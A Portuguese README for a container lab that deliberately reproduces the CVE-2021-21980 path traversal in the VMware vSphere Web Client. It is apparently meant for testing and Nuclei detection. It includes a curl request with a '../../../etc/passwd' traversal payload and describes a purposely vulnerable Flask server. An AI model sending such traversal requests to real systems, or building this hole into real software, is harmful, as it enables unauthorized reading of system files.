
Laboratório vulnerável realista para CVE-2021-21980 (VMware vSphere Path Traversal) - Exploração real de arquivos, não um servidor simulado
Ambiente de teste realista simulando a vulnerabilidade de path traversal do VMware vSphere Web Client.
⚠️ AVISO: Ambiente de teste vulnerável. NÃO exponha à internet!
podman build -t vcenter-lab .
podman run -d -p 443:443 --name vcenter-lab vcenter-lab
curl -k "https://localhost/ui/vic-rest/services/containerView?id=../../../etc/passwd"
nuclei -t CVE-2021-21980.yaml -u https://localhost -debug
✅ Realmente lê arquivos do sistema de arquivos do contêiner usando E/S de arquivo Python
✅ Comportamento realista - Lida com path traversal como o vSphere real
✅ Headers VMware - Inclui Server: VMware-HTTP-Server/1.0
✅ SSL/TLS - Geração de certificado autoassinado
✅ Não hardcoded - Retorna o conteúdo real do arquivo
Dockerfile - Configuração de construção do contêinerserver.py - Aplicação Flask vulnerávelCVE-2021-21980.yaml - Template de detecção NucleiREADME.md - Este arquivoEste laboratório foi validado com Nuclei mostrando:
podman stop vcenter-lab && podman rm vcenter-lab